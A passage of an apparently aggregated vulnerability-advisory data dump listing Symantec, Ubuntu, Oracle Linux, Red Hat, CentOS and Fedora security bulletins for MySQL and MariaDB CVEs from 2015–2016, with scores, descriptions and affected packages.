\n \n \n\n**CVE-2015-4905** \n--- \n**Severity / CVSSv2** | Medium / 4.0 (AV:N/AC:L/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77143](<https://www.securityfocus.com/bid/77143>) / NVD: [CVE-2015-4905](<https://nvd.nist.gov/vuln/detail/CVE-2015-4905>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4910** \n--- \n**Severity / CVSSv2** | Low / 2.1 (AV:N/AC:H/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77234](<https://www.securityfocus.com/bid/77234>) / NVD: [CVE-2015-4910](<https://nvd.nist.gov/vuln/detail/CVE-2015-4910>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: Memcached sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n \n\n**CVE-2015-4913** \n--- \n**Severity / CVSSv2** | Low / 3.5 (AV:N/AC:M/Au:S/C:N/I:N/A:P) \n**References** | SecurityFocus: [BID 77153](<https://www.securityfocus.com/bid/77153>) / NVD: [CVE-2015-4913](<https://nvd.nist.gov/vuln/detail/CVE-2015-4913>) \n**Impact** | Denial of service \n**Description** | A flaw in the Server: DML sub-component allows a remote authenticated attacker to cause the server application to hang or repeatedly crash, resulting in denial of service. \n \n### \n\n### REFERENCES\n\nOracle Critical Patch Update Advisory (October 2015) - <https://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html#AppendixMSQL>\n\n### REVISION\n\n2016-11-01 Vulnerability inquiries for DLP should be addressed to Digital Guardian technical support. SA status moved to Final. \n2016-06-11 PolicyCenter S-Series is not vulnerable. \n2016-05-11 No Cloud Data Protection products are vulnerable. \n2016-04-24 Mail Threat Defense is not vulnerable. 
\n2016-03-10 A fix for MAA 4.2 is available in 4.2.8. It was previously reported that MAA 4.2 is vulnerable to CVE-2015-4730, CVE-2015-4766, CVE-2015-4791, CVE-2015-4807, CVE-2015-4833, CVE-2015-4862, CVE-2015-4866, CVE-2015-4890, CVE-2015-4895, CVE-2015-4904, CVE-2015-4905, and CVE-2015-4910. Further investigation has shown that MAA 4.2 is not vulnerable to those CVEs. \n2015-12-17 initial public release\n", "modified": "2020-03-03T19:57:36", "published": "2015-12-17T08:00:00", "id": "SMNTC-1341", "href": "", "type": "symantec", "title": "SA106 : MySQL Vulnerabilities October 2015", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-02T11:42:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4895", "CVE-2015-4866", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2015-4864", "CVE-2015-4910", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4800", "CVE-2015-4879", "CVE-2015-4792", "CVE-2015-4904", "CVE-2015-4833", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4766", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4826", "CVE-2015-4862", "CVE-2015-4890"], "description": "Multiple security issues were discovered in MySQL and this update includes \nnew upstream MySQL versions to fix these issues.\n\nMySQL has been updated to 5.5.46 in Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. 
\nUbuntu 15.04 and Ubuntu 15.10 have been updated to MySQL 5.6.27.\n\nIn addition to security fixes, the updated packages contain bug fixes, \nnew features, and possibly incompatible changes.\n\nPlease see the following for more information: \n<http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-45.html> \n<http://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-46.html> \n<http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-26.html> \n<http://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-27.html> \n<http://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html>", "edition": 5, "modified": "2015-10-26T00:00:00", "published": "2015-10-26T00:00:00", "id": "USN-2781-1", "href": "https://ubuntu.com/security/notices/USN-2781-1", "title": "MySQL vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:17", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2015-4819", "CVE-2016-0598", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2015-7744", "CVE-2016-0505"], "description": "[1:5.5.47-1]\n- Rebase to 5.5.47\n Also fixes: CVE-2015-4792 CVE-2015-4802 CVE-2015-4815 CVE-2015-4816\n CVE-2015-4819 CVE-2015-4826 CVE-2015-4830 CVE-2015-4836 CVE-2015-4858\n CVE-2015-4861 CVE-2015-4870 CVE-2015-4879 CVE-2015-4913 CVE-2015-7744\n CVE-2016-0505 CVE-2016-0546 CVE-2016-0596 CVE-2016-0597 CVE-2016-0598\n CVE-2016-0600 CVE-2016-0606 CVE-2016-0608 CVE-2016-0609 CVE-2016-0616\n CVE-2016-2047\n Resolves: #1304515\n[1:5.5.44-3]\n- MDEV-8827 Duplicate key with auto increment\n fix innodb auto-increment handling three bugs:\n 1. 
innobase_next_autoinc treated the case of current\n 2. ha_innobase::get_auto_increment didn't recalculate current when increment changed\n 3. ha_innobase::get_auto_increment didn't pass offset down to innobase_next_autoinc\n Resolves: #1300621", "edition": 4, "modified": "2016-03-31T00:00:00", "published": "2016-03-31T00:00:00", "id": "ELSA-2016-0534", "href": "http://linux.oracle.com/errata/ELSA-2016-0534.html", "title": "mariadb security and bug fix update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2016-09-04T11:17:46", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2015-4819", "CVE-2016-0598", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2016-0505"], "description": "MariaDB is a multi-user, multi-threaded SQL database server that is binary\ncompatible with MySQL.\n\nIt was found that the MariaDB client library did not properly check host\nnames against server identities noted in the X.509 certificates when\nestablishing secure connections using TLS/SSL. A man-in-the-middle attacker\ncould possibly use this flaw to impersonate a server to a client.\n(CVE-2016-2047)\n\nThis update fixes several vulnerabilities in the MariaDB database server.\nInformation about these flaws can be found on the Oracle Critical Patch\nUpdate Advisory page, listed in the References section. 
(CVE-2015-4792,\nCVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826,\nCVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870,\nCVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596,\nCVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608,\nCVE-2016-0609, CVE-2016-0616)\n\nThis update also fixes the following bug:\n\n* When more than one INSERT operation was executed concurrently on a\nnon-empty InnoDB table with an AUTO_INCREMENT column defined as a primary\nkey immediately after starting MariaDB, a race condition could occur. As a\nconsequence, one of the concurrent INSERT operations failed with a\n\"Duplicate key\" error message. A patch has been applied to prevent the race\ncondition. Now, each row inserted as a result of the concurrent INSERT\noperations receives a unique primary key, and the operations no longer fail\nin this scenario. (BZ#1303946)\n\nThese updated packages upgrade MariaDB to version 5.5.47. Refer to the\nMariaDB Release Notes listed in the References section for a complete list\nof changes.\n\nAll MariaDB users should upgrade to these updated packages, which correct\nthese issues. 
After installing this update, the mariadb service will be\nrestarted automatically.\n", "modified": "2016-06-16T14:27:25", "published": "2016-02-03T05:00:00", "id": "RHSA-2016:22610", "href": "https://access.redhat.com/errata/RHSA-2016:22610", "type": "redhat", "title": "(RHSA-2016:22610) Moderate: mariadb security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-11T13:31:18", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4913", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0616", "CVE-2016-0642", "CVE-2016-0651", "CVE-2016-2047", "CVE-2016-3471"], "description": "MariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a newer upstream version: MariaDB (5.5.47). Refer to the MariaDB Release Notes listed in the References section for a complete list of changes.\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. 
(CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616)\n\nBug Fix(es):\n\n* When more than one INSERT operation was executed concurrently on a non-empty InnoDB table with an AUTO_INCREMENT column defined as a primary key immediately after starting MariaDB, a race condition could occur. As a consequence, one of the concurrent INSERT operations failed with a \"Duplicate key\" error message. A patch has been applied to prevent the race condition. Now, each row inserted as a result of the concurrent INSERT operations receives a unique primary key, and the operations no longer fail in this scenario. (BZ#1303946)", "modified": "2018-04-12T03:33:06", "published": "2016-03-31T18:15:24", "id": "RHSA-2016:0534", "href": "https://access.redhat.com/errata/RHSA-2016:0534", "type": "redhat", "title": "(RHSA-2016:0534) Moderate: mariadb security and bug fix update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:55", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4913", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0616", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0666", "CVE-2016-2047", "CVE-2016-3452", "CVE-2016-3471", "CVE-2016-5444"], "description": "MariaDB is a multi-user, 
multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL.\n\nThe following packages have been upgraded to a newer upstream version: mariadb55-mariadb (5.5.49).\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0651, CVE-2016-0666, CVE-2016-3452, CVE-2016-3471, CVE-2016-5444)", "modified": "2018-06-13T01:28:17", "published": "2016-07-25T11:45:27", "id": "RHSA-2016:1481", "href": "https://access.redhat.com/errata/RHSA-2016:1481", "type": "redhat", "title": "(RHSA-2016:1481) Moderate: mariadb55-mariadb security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:44:59", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4913", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", 
"CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0616", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0666", "CVE-2016-2047", "CVE-2016-3452", "CVE-2016-3471", "CVE-2016-3477", "CVE-2016-3521", "CVE-2016-3615", "CVE-2016-5440", "CVE-2016-5444"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: mysql55-mysql (5.5.50).\n\nSecurity Fix(es):\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0651, CVE-2016-0666, CVE-2016-2047, CVE-2016-3452, CVE-2016-3471, CVE-2016-3477, CVE-2016-3521, CVE-2016-3615, CVE-2016-5440, CVE-2016-5444)", "modified": "2018-06-13T01:28:23", "published": "2016-07-25T11:45:08", "id": "RHSA-2016:1480", "href": "https://access.redhat.com/errata/RHSA-2016:1480", "type": "redhat", "title": "(RHSA-2016:1480) Important: mysql55-mysql security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:09", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", 
"CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4870", "CVE-2015-4890", "CVE-2015-4910", "CVE-2015-4913", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0639", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0655", "CVE-2016-0661", "CVE-2016-0665", "CVE-2016-0666", "CVE-2016-0668", "CVE-2016-2047", "CVE-2016-3452", "CVE-2016-3471", "CVE-2016-5444"], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of the MySQL server daemon, mysqld, and many client programs.\n\nThe following packages have been upgraded to a newer upstream version: rh-mysql56-mysql (5.6.30).\n\nSecurity Fix(es):\n\n* This update fixes several vulnerabilities in the MySQL database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory pages, listed in the References section. 
(CVE-2015-4792, CVE-2015-4800, CVE-2015-4802, CVE-2015-4815, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4862, CVE-2015-4870, CVE-2015-4890, CVE-2015-4910, CVE-2015-4913, CVE-2016-0503, CVE-2016-0504, CVE-2016-0505, CVE-2016-0546, CVE-2016-0595, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0605, CVE-2016-0606, CVE-2016-0607, CVE-2016-0608, CVE-2016-0609, CVE-2016-0610, CVE-2016-0611, CVE-2016-0639, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0655, CVE-2016-0661, CVE-2016-0665, CVE-2016-0666, CVE-2016-0668, CVE-2016-2047)", "modified": "2018-06-13T01:28:21", "published": "2016-05-02T16:15:44", "id": "RHSA-2016:0705", "href": "https://access.redhat.com/errata/RHSA-2016:0705", "type": "redhat", "title": "(RHSA-2016:0705) Critical: rh-mysql56-mysql security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:06", "bulletinFamily": "unix", "cvelist": ["CVE-2015-3210", "CVE-2015-3217", "CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4895", "CVE-2015-4913", "CVE-2015-5073", "CVE-2015-8381", "CVE-2015-8383", "CVE-2015-8384", "CVE-2015-8385", "CVE-2015-8386", "CVE-2015-8388", "CVE-2015-8391", "CVE-2015-8392", "CVE-2015-8395", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0600", "CVE-2016-0606", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0616", "CVE-2016-0640", "CVE-2016-0641", "CVE-2016-0642", "CVE-2016-0643", "CVE-2016-0644", "CVE-2016-0646", "CVE-2016-0647", "CVE-2016-0648", "CVE-2016-0649", "CVE-2016-0650", "CVE-2016-0651", "CVE-2016-0655", "CVE-2016-0666", "CVE-2016-0668", "CVE-2016-1283", "CVE-2016-2047", 
"CVE-2016-3191", "CVE-2016-3452", "CVE-2016-3459", "CVE-2016-3471", "CVE-2016-5444"], "description": "MariaDB is a multi-user, multi-threaded SQL database server. For all practical purposes, MariaDB is binary-compatible with MySQL. MariaDB uses PCRE, a Perl-compatible regular expression library, to implement regular expression support in SQL queries.\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. (CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4895, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0610, CVE-2016-0616, CVE-2016-0640, CVE-2016-0641, CVE-2016-0642, CVE-2016-0643, CVE-2016-0644, CVE-2016-0646, CVE-2016-0647, CVE-2016-0648, CVE-2016-0649, CVE-2016-0650, CVE-2016-0651, CVE-2016-0655, CVE-2016-0666, CVE-2016-0668)\n\n* Multiple flaws were found in the way PCRE handled malformed regular expressions. An attacker able to make MariaDB execute an SQL query with a specially crafted regular expression could use these flaws to cause it to crash or, possibly, execute arbitrary code. 
(CVE-2015-3210, CVE-2015-3217, CVE-2015-5073, CVE-2015-8381, CVE-2015-8383, CVE-2015-8384, CVE-2015-8385, CVE-2015-8386, CVE-2015-8388, CVE-2015-8391, CVE-2015-8392, CVE-2015-8395, CVE-2016-1283, CVE-2016-3191)", "modified": "2018-06-13T01:28:20", "published": "2016-05-26T12:10:09", "id": "RHSA-2016:1132", "href": "https://access.redhat.com/errata/RHSA-2016:1132", "type": "redhat", "title": "(RHSA-2016:1132) Important: rh-mariadb100-mariadb security update", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:26:37", "bulletinFamily": "unix", "cvelist": ["CVE-2016-0608", "CVE-2016-0600", "CVE-2015-4830", "CVE-2015-4816", "CVE-2015-4913", "CVE-2016-0546", "CVE-2016-2047", "CVE-2015-4858", "CVE-2015-4802", "CVE-2016-0606", "CVE-2015-4815", "CVE-2016-3471", "CVE-2016-0616", "CVE-2016-0609", "CVE-2015-4879", "CVE-2016-0596", "CVE-2015-4792", "CVE-2016-0642", "CVE-2015-4819", "CVE-2016-0598", "CVE-2016-0651", "CVE-2015-4836", "CVE-2015-4861", "CVE-2015-4870", "CVE-2016-0597", "CVE-2015-4826", "CVE-2016-0505"], "description": "**CentOS Errata and Security Advisory** CESA-2016:0534\n\n\nMariaDB is a multi-user, multi-threaded SQL database server that is binary compatible with MySQL.\n\nThe following packages have been upgraded to a newer upstream version: MariaDB (5.5.47). Refer to the MariaDB Release Notes listed in the References section for a complete list of changes.\n\nSecurity Fix(es):\n\n* It was found that the MariaDB client library did not properly check host names against server identities noted in the X.509 certificates when establishing secure connections using TLS/SSL. A man-in-the-middle attacker could possibly use this flaw to impersonate a server to a client. (CVE-2016-2047)\n\n* This update fixes several vulnerabilities in the MariaDB database server. Information about these flaws can be found on the Oracle Critical Patch Update Advisory page, listed in the References section. 
(CVE-2015-4792, CVE-2015-4802, CVE-2015-4815, CVE-2015-4816, CVE-2015-4819, CVE-2015-4826, CVE-2015-4830, CVE-2015-4836, CVE-2015-4858, CVE-2015-4861, CVE-2015-4870, CVE-2015-4879, CVE-2015-4913, CVE-2016-0505, CVE-2016-0546, CVE-2016-0596, CVE-2016-0597, CVE-2016-0598, CVE-2016-0600, CVE-2016-0606, CVE-2016-0608, CVE-2016-0609, CVE-2016-0616)\n\nBug Fix(es):\n\n* When more than one INSERT operation was executed concurrently on a non-empty InnoDB table with an AUTO_INCREMENT column defined as a primary key immediately after starting MariaDB, a race condition could occur. As a consequence, one of the concurrent INSERT operations failed with a \"Duplicate key\" error message. A patch has been applied to prevent the race condition. Now, each row inserted as a result of the concurrent INSERT operations receives a unique primary key, and the operations no longer fail in this scenario. (BZ#1303946)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2016-March/033819.html\n\n**Affected packages:**\nmariadb\nmariadb-bench\nmariadb-devel\nmariadb-embedded\nmariadb-embedded-devel\nmariadb-libs\nmariadb-server\nmariadb-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2016-0534.html", "edition": 5, "modified": "2016-03-31T20:53:35", "published": "2016-03-31T20:53:35", "id": "CESA-2016:0534", "href": "http://lists.centos.org/pipermail/centos-announce/2016-March/033819.html", "title": "mariadb security update", "type": "centos", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4895", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", 
"CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MariaDB is a community developed branch of MySQL. MariaDB is a multi-user, multi-threaded SQL database server. It is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MariaDB/MySQL client programs and generic MySQL files. ", "modified": "2016-02-21T16:34:44", "published": "2016-02-21T16:34:44", "id": "FEDORA:0994E61361B1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 23 Update: mariadb-10.0.23-1.fc23", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4792", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4816", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4895", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MariaDB is a community developed branch of MySQL. MariaDB is a multi-user, multi-threaded SQL database server. It is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MariaDB/MySQL client programs and generic MySQL files. 
", "modified": "2016-03-05T22:51:47", "published": "2016-03-05T22:51:47", "id": "FEDORA:2C4E6617FD66", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 22 Update: mariadb-10.0.23-1.fc22", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4766", "CVE-2015-4791", "CVE-2015-4792", "CVE-2015-4800", "CVE-2015-4802", "CVE-2015-4807", "CVE-2015-4815", "CVE-2015-4819", "CVE-2015-4826", "CVE-2015-4830", "CVE-2015-4833", "CVE-2015-4836", "CVE-2015-4858", "CVE-2015-4861", "CVE-2015-4862", "CVE-2015-4864", "CVE-2015-4866", "CVE-2015-4870", "CVE-2015-4879", "CVE-2015-4890", "CVE-2015-4895", "CVE-2015-4904", "CVE-2015-4905", "CVE-2015-4910", "CVE-2015-4913", "CVE-2015-7744", "CVE-2016-0502", "CVE-2016-0503", "CVE-2016-0504", "CVE-2016-0505", "CVE-2016-0546", "CVE-2016-0594", "CVE-2016-0595", "CVE-2016-0596", "CVE-2016-0597", "CVE-2016-0598", "CVE-2016-0599", "CVE-2016-0600", "CVE-2016-0601", "CVE-2016-0605", "CVE-2016-0606", "CVE-2016-0607", "CVE-2016-0608", "CVE-2016-0609", "CVE-2016-0610", "CVE-2016-0611", "CVE-2016-0616"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. 
